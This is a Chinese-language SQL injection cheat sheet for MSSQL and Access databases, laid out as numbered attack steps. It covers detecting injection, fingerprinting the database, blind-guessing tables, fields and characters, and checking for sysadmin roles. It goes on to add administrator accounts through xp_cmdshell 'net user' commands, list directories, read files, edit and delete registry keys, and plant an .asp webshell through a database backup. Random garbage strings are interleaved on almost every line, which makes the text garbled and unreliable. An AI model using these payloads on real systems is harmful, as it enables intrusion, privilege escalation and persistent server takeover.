1.判断是否有注入;and 1=1 ;and 1=2 'EH
2.初步判断是否是mssql ;and user>0 $&n240(
n{qw ]/
3.注入参数是字符'and [查询条件] and ''=' +lDGr/
0%&fUz36E6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Jq?^8y
=?I1V#.
5.判断数据库系统 {%+3D,$)
gqHH Hh
;and (select count(*) from sysobjects)>0 mssql 4?*"7t3
nkCRe
;and (select count(*) from msysobjects)>0 access W O \lny!
(X`t"*y"
;2xXX,'R7
EDa08+Y
6.猜数据库 ;and (select Count(*) from [数据库名])>0 z*k3q`=>
*C:q _/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -SC2Zgi)A
fXXm@tMx>
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 b$`4Nn|
"|l
oSf@
9.(1)猜字段的ascii值(access) 9 (FcA5Y
2AdHj&XE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )/N Xh'
0or6_y6
(2)猜字段的ascii值(mssql) $nD k
mKl
pS|JDMo
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 o y%g{,V
;ZqD60%\
10.测试权限结构(mssql) ow>[#.ua
aY1#K6(y
"6Hjji@A
"*>QxA%c4
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z]> e & N
C7*Yg$`{
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +[l{C+p
PRf\6
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ~pBxFA
dU04/]modD
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- $m%/veD k
{D2d({7
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- O9 Au =
TXk"[>,:H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- cF<DUr)Ve
NN pa69U
;and 1=(select IS_MEMBER('db_owner'));-- $MVeMgPa
E6&uZr
+WEO]q?K
93p9?4;n-
11.添加mssql和系统的帐户 >8HRnCyp/
&)'kX
;exec master.dbo.sp_addlogin username;-- Ei(`gp
;exec master.dbo.sp_password null,username,password;-- ; >hPHx
H(ftOd.y
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- oO9iB:w
+z/73s0~
;exec master.dbo.xp_cmdshell 'net user username password w\Eve:
sAAIyPJts
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- )da8Ru
_"e(
^yiK
;exec master.dbo.xp_cmdshell 'net user username password /add';-- T=KrT7
n#AH@`&i
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Uc;IPS
Cr\/<zy1-e
V\lF:3C
Qz90 mb
12.(1)遍历目录 MhB=+S[@
ON=ley
;create table dirs(paths varchar(100), id int) K1:)J.ca_
vP;tgW9Qk
;insert dirs exec master.dbo.xp_dirtree 'c:\' k5\
zGsol
/|^^v DL
;and (select top 1 paths from dirs)>0 SxQDqoA~
GnHf9
JrR
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;7{wa]
UVRV7^eTe
^rb7`s#G
|"&4"nwa
(2)遍历目录 e/~<\
<}>-ip?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- S^_yiV
S
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 fH{$LjH(
XSIO0ep
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 &%51jM<
6h"?3w
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ,=yIfbFQ
j>=".^J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 fA,!d J
5%$kAJZC-
nr6[rq
g5]DA.&(
13.mssql中的存储过程 @y%qQe/g
_e^V\O>
xp_regenumvalues 注册表根键, 子键 hIHO a
~0t'+.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $O>MV
RLr-xg$K-t
xp_regread 根键,子键,键值名 N1t:i? q&
pfIvBU?
;exec xp_regread 7}?z=LHb3
RozsRt;i
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 hkm3\wg
ZuON@ (
xp_regwrite 根键,子键, 值名, 值类型, 值 z#!Cg*K(
}e6:&`a xD
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =swcmab;
l0,O4k2 '
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #@`^
.
9]9(o
xp_regdeletevalue 根键,子键,值名 DA\O,^49h
B) iJH
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `hhG^O_
auv\fR :
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 mcracj[B
:H7 "W<
1A
*8Jnw
{hR23eE)#
14.mssql的backup创建webshell <>GyG-q
1 ErYob.p
use model WNi<|A#T{
&ICO{#v5
create table cmd(str image); zAIC5fvu
{,X(fJ
insert into cmd(str) values (''); }9dgm[C[b
w9BH>56/"
backup database model to disk='c:\l.asp'; u?i1n=Ne
HBu>BSv:
bvKi0-
}2{#=Elh
15.mssql内置函数 c`Cn9bX
Ky|0IKE8Z
;and (select @@version)>0 获得Windows的版本号 HB^azHr
%mJ)pMV
;and user_name()='dbo' 判断当前系统的连接用户是不是sa tIw4V^'|
SfR_#"Uu
;and (select user_name())>0 爆当前系统的连接用户 PGDlSB^O
X35hLp8 M
;and (select db_name())>0 得到当前连接的数据库 6P8X)3CE<T
G_@H:4$3
4RNzh``u
`pr,lL
16.简洁的webshell YVi]f2F%
&iivSc;#
use model )1ciO+_
{s]eXc]K}
create table cmd(str image); K9iR>put
e$Ej7_.#;
insert into cmd(str) values (''); Yy]Henw;
UWp(3FQ
backup database model to disk='g:\wwwtest\l.asp';